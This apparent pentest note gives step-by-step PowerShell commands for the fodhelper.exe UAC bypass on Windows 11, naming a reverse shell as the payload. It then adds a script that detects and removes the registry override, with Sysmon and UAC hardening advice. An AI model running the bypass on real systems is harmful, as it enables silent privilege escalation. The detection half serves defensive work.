Fodhelper.exe

Check the integrity level of the current shell first:

whoami /groups

The output should contain Mandatory Label\Medium Mandatory Level

(not High Mandatory Level), i.e. the shell is not already elevated.

Working Bypass

Works as of 04/06/2023 on Windows 11 Enterprise 22621.ni_release.220506-1250

# Register a per-user handler for the ms-settings protocol (HKCU is consulted before HKLM)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
# An empty DelegateExecute value makes the shell fall back to the (default) command
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
# The (default) value is the command that fodhelper ends up launching
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\User\ConsoleApp1.exe" -Force
# Launch the auto-elevating binary
fodhelper.exe

(ConsoleApp1.exe stands for the binary you want launched with High integrity, e.g. your reverse shell.)

We are abusing Fodhelper's auto-elevate (set to True by default), so it starts with High integrity without a UAC prompt. It then looks up the ms-settings handler in the registry and finds our per-user key first, so our binary is executed in High integrity, thus bypassing UAC.
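From the defender's side, the artifact this technique leaves behind is the per-user ms-settings handler. The following PowerShell check is an added example, not part of the original note; it walks every loaded user hive under HKEY_USERS and reports the override (note that writes to HKCU:\Software\Classes land in the <SID>_Classes hive, so both locations are checked). It assumes an elevated shell so all hives are readable.

```powershell
# Added detection/cleanup check (not part of the original note) for the
# fodhelper-style ms-settings handler override. Assumes it runs elevated.
if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}

$findings = foreach ($hive in Get-ChildItem -Path 'HKU:\') {
    $sid = $hive.PSChildName
    # HKCU\Software\Classes is a merged view: per-user class data written through
    # it is stored in the <SID>_Classes hive, while the plain <SID> hive may also
    # carry a Software\Classes branch. Check both spellings of the path.
    if ($sid -like '*_Classes') {
        $path = "HKU:\$sid\ms-settings\Shell\Open\command"
    } else {
        $path = "HKU:\$sid\Software\Classes\ms-settings\Shell\Open\command"
    }
    if (Test-Path -Path $path) {
        $props = Get-ItemProperty -Path $path
        [pscustomobject]@{
            Hive            = $sid
            Command         = $props.'(default)'      # binary fodhelper would launch
            DelegateExecute = $props.DelegateExecute  # empty string in the bypass
        }
    }
}

if ($findings) {
    Write-Warning 'Per-user ms-settings handler found (fodhelper UAC bypass indicator):'
    $findings | Format-Table -AutoSize
    # Remediation: delete the per-user ms-settings class so the HKLM handler applies again.
    # Uncomment to clean up after review:
    # foreach ($f in $findings) {
    #     $root = if ($f.Hive -like '*_Classes') { "HKU:\$($f.Hive)" } else { "HKU:\$($f.Hive)\Software\Classes" }
    #     Remove-Item -Path "$root\ms-settings" -Recurse -Force
    # }
} else {
    'No per-user ms-settings handler override found.'
}
```

For ongoing detection, alert on registry writes to this key path (Sysmon Event ID 13) and on fodhelper.exe spawning a non-Microsoft child process; setting UAC to "Always notify" disables auto-elevation and prevents the silent elevation in the first place.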
